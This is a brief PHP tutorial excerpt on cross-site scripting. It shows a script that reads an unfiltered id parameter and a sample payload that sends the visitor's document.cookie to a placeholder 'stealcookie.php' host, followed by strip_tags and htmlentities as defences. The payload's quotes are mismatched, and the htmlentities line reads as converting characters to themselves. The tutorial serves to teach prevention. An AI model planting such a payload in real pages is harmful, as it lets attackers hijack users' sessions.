Cross Site Scripting (XSS)
Here is an example of a simple script vulnerable to XSS and is used to fetch a news item based on an ID:
$id = $_GET[‘id’];
If $_GET[‘id’] contains a number, then the script will run as intended. What happens if it contains the following:
<script>window.location.href = “http://domain.com/stealcookie.php?c=’ + document.cookie;</script>
How to prevent XSS attacks?
- strip_tags(): Used to remove HTML from a string rendering it harmless.
- htmlentities(): Used to convert < and > to < and > respectively, if you do not want to remove HTML from a string.